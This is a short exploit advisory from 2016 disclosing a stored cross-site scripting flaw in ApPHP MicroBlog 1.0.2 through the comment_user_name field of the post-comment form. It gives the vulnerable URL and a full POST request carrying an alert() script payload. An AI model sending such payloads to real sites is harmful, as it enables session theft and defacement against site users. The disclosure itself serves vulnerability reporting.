ApPHP MicroBlog 1.0.2 Cross Site Scripting
Posted on 13 October 2016
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting # Author : Besim # Google Dork : # Date : 12/10/2016 # Type : webapps # Platform : PHP # Vendor Homepage : - # Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 Description : Vulnerable link : http://site_name/path/index.php?page=posts&post_id= Stored XSS Payload ( Comments ): * # Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section # Vuln. Parameter : comment_user_name ############ POST DATA ############ task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish your comment ############ ######################